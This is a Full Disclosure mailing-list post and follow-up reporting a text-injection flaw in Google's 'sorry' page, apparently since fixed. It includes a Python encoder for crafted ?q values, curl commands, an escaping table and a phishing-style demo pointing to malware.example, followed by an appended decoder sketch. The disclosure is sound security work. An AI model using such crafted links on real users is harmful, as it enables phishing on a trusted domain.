I tested a few more times, and it appears the text injection has disappeared.
These are timestamps when I tested, with offsets relative to the initial discovery.

 +0h 2025-01-28 03:00 initial discovery
 +5h 2025-01-28 08:19 ?q=EgtoZWxsbyB3b3JsZA works (https://archive.is/DD9xB)
+14h 2025-01-28 17:31 ?q=EgtoZWxsbyB3b3JsZA works (no archive)
+45h 2025-01-30 00:18 ?q=EgtoZWxsbyB3b3JsZA doesn't work (https://archive.is/0PJRW)

On Tue, Jan 28, 2025 at 02:26:16AM -0700, David Fifield wrote:
> The page https://www.google.com/sorry/index is familiar to Tor and VPN
> users. It is the one that says "Our systems have detected unusual
> traffic from your computer network. Please try your request again
> later." You will frequently be redirected to this page when using Tor
> Browser, when you do a search on a Google site such as www.youtube.com
> or scholar.google.com. The text of the page reports the client IP
> address, a timestamp of the request, and the URL that was requested.
>
> At 2025-01-28 03:00 or earlier, the "sorry" page changed its behavior
> from what I have seen before. After the client IP address, the page now
> displays " ≠ ", followed by a few apparently nonsense bytes (not even
> necessarily properly UTF-8–encoded). The extra bytes turn out to come
> from a data structure that is encoded in the ?q URL query parameter. By
> changing the ?q parameter, you can make the string of bytes have any
> length and contents you like. The byte string will be included in the
> HTML body, after the client IP address and " ≠ ". However, any bytes
> that have meaning in HTML will be HTML-escaped, so while you can make
> text appear on the page, no XSS is possible, as far as I can tell.
>
> This is a simple demonstration:
>
>     https://www.google.com/sorry/index?q=EgtoZWxsbyB3b3JsZA
>     (archived) https://archive.is/DD9xB
>
> This displays:
>
>     IP address: <client IP address> ≠ hello world
>
> Let's decode the ?q payload to see what's going on.
>
>     $ python3 -c 'import base64; print(repr(base64.urlsafe_b64decode("EgtoZWxsbyB3b3JsZA==")))'
>     b'\x12\x0bhello world'
>
> After base64 decoding, the first byte is 0x12, which is some kind of
> data type indicator. The second byte, 0x0b, is the length of the value
> to follow. Then the value is what ends up being copied into the page.
>
> The length field is actually a Protobuf varint. Lengths greater than 127
> need to be encoded as more than 1 byte:
> https://protobuf.dev/programming-guides/encoding/#varints
> The following is a Python program to encode arbitrary byte strings
> appropriately for the ?q parameter:
>
>     #!/usr/bin/env python3
>     import base64
>     import sys
>     if len(sys.argv) > 1:
>         payload, = sys.argv[1:]
>         payload = payload.encode()
>     else:
>         payload = sys.stdin.buffer.read()
>     def encode_varint(n):
>         e = [n & 0x7f]
>         n >>= 7
>         while n > 0:
>             e[len(e) - 1] |= 0x80
>             e.append(n & 0x7f)
>             n >>= 7
>         return bytes(e)
>     print(base64.urlsafe_b64encode(b"\x12" + encode_varint(len(payload)) +
>                                    payload).rstrip(b"=").decode())
>
> Use it as follows, for example:
>
>     $ curl "https://www.google.com/sorry/index?q=$(printf 'hello world' | ./sorry-payload)"
>
> You can see what HTML escaping the server applies by sending a string
> that consists of every byte value:
>
>     $ curl "https://www.google.com/sorry/index?q=$(for c in $(seq 0 255); do printf '\x'$(printf %02x $c); done | ./sorry-payload)" -o resp
>
>     00000000: 0001 0203 0405 0607 0820 2020 2020 0e0f  .........     ..
>     00000010: 1011 1213 1415 1617 1819 1a1b 1c1d 1e1f  ................
>     00000020: 2021 2671 756f 743b 2324 2526 616d 703b   !&quot;#$%&amp;
>     00000030: 2623 3339 3b28 292a 2b2c 2d2e 2f30 3132  &#39;()*+,-./012
>     00000040: 3334 3536 3738 393a 3b26 6c74 3b3d 2667  3456789:;&lt;=&g
>     00000050: 743b 3f40 4142 4344 4546 4748 494a 4b4c  t;?@ABCDEFGHIJKL
>     00000060: 4d4e 4f50 5152 5354 5556 5758 595a 5b5c  MNOPQRSTUVWXYZ[\
>     00000070: 5d5e 5f60 6162 6364 6566 6768 696a 6b6c  ]^_`abcdefghijkl
>     00000080: 6d6e 6f70 7172 7374 7576 7778 797a 7b7c  mnopqrstuvwxyz{|
>     00000090: 7d7e 7f80 8182 8384 8586 8788 898a 8b8c  }~..............
>     000000a0: 8d8e 8f90 9192 9394 9596 9798 999a 9b9c  ................
>     000000b0: 9d9e 9fa0 a1a2 a3a4 a5a6 a7a8 a9aa abac  ................
>     000000c0: adae afb0 b1b2 b3b4 b5b6 b7b8 b9ba bbbc  ................
>     000000d0: bdbe bfc0 c1c2 c3c4 c5c6 c7c8 c9ca cbcc  ................
>     000000e0: cdce cfd0 d1d2 d3d4 d5d6 d7d8 d9da dbdc  ................
>     000000f0: ddde dfe0 e1e2 e3e4 e5e6 e7e8 e9ea ebec  ................
>     00000100: edee eff0 f1f2 f3f4 f5f6 f7f8 f9fa fbfc  ................
>     00000110: fdfe ff                                  ...
>
> The following replacements are applied:
>
>     0x09 HT becomes 0x20
>     0x0a LF becomes 0x20
>     0x0b VT becomes 0x20
>     0x0c FF becomes 0x20
>     0x0d CR becomes 0x20
>     0x22 "  becomes &quot;
>     0x26 &  becomes &amp;
>     0x27 '  becomes &#39;
>     0x3c <  becomes &lt;
>     0x3e >  becomes &gt;
>
> Besides 0x12, there are other type codes normally present in the ?q
> parameter. Collect a few ?q parameter values organically, base64 decode
> them, and you will see similar structures and repeated byte strings. If
> ?q contains more than one 0x12 specification, it looks like the last one
> wins. In the ?q values I saw, the 0x12 value was 4 bytes long, and
> contained the IPv4 address of a Tor exit node. The " ≠ " after the
> textual client IP address makes it look like it's some debugging code
> related to IP address comparison.
>
> You can get the "sorry" page in languages other than English using
> either the ?hl URL query parameter or the Accept-Language HTTP header.
> The languages I tried used the same escaping as the default English one.
> The ?ie and ?oe (input encoding and output encoding;
> https://developers.google.com/custom-search/docs/xml_results#wsCharacterEncoding)
> parameters do not appear to have any effect.
>
>     $ curl "https://www.google.com/sorry/index?q=$(printf 'hello world' | ./sorry-payload)" -H 'Accept-Language: zh-CN'
>     https://www.google.com/sorry/index?q=EgtoZWxsbyB3b3JsZA&hl=zh-CN
>     (archive) https://archive.is/P6dbS
>
> Though it's not possible to inject active content such as HTML or
> JavaScript, one could cause a phishing-style plaintext URL to appear on
> the page:
>
>     $ curl "https://www.google.com/sorry/index?q=$(printf 'Copy and paste this URL to fix the problem: \u27a1\ufe0fhttp://malware.example/\u2b05\ufe0f' | ./sorry-payload)"
>
>     https://www.google.com/sorry/index?q=Ek9Db3B5IGFuZCBwYXN0ZSB0aGlzIFVSTCB0byBmaXggdGhlIHByb2JsZW06IOKeoe-4j2h0dHA6Ly9tYWx3YXJlLmV4YW1wbGUv4qyF77iP
>     (archive) https://archive.is/D8cf4
>
> Similar tricks are possible with the ?continue URL query parameter,
> which is omitted in the above examples, but which normally appears in
> redirections to https://www.google.com/sorry/index. The contents of
> ?continue get inserted after the "URL: " label on the page.

_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: https://seclists.org/fulldisclosure/
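
For checking ?q values by hand, the encoding described in the quoted message can be reversed. The following is only a minimal sketch, and it assumes the value has exactly the simple form shown there: the byte 0x12, a varint length, then the value. The names decode_varint and decode_sorry_payload are made up for this illustration and do not come from the original program. Organically collected ?q values contain other type codes, which this sketch does not try to interpret.

```python
#!/usr/bin/env python3
import base64

def decode_varint(buf, pos=0):
    """Decode a Protobuf-style varint at buf[pos]; return (value, next_pos)."""
    value = 0
    shift = 0
    while True:
        b = buf[pos]
        pos += 1
        value |= (b & 0x7f) << shift   # low 7 bits carry data, least significant group first
        if not (b & 0x80):             # high bit clear: this was the last byte
            return value, pos
        shift += 7

def decode_sorry_payload(q):
    """Return the byte string carried in a ?q value of the assumed simple form."""
    padded = q + "=" * (-len(q) % 4)   # restore the "=" padding the encoder stripped
    raw = base64.urlsafe_b64decode(padded)
    if raw[:1] != b"\x12":
        raise ValueError("payload does not start with type byte 0x12")
    length, pos = decode_varint(raw, 1)
    value = raw[pos:pos + length]
    if len(value) != length:
        raise ValueError("payload is shorter than its declared length")
    return value

if __name__ == "__main__":
    print(decode_sorry_payload("EgtoZWxsbyB3b3JsZA"))  # b'hello world'
```

Applied to the demonstration value EgtoZWxsbyB3b3JsZA, this recovers the bytes "hello world", matching the python3 -c output in the quoted message.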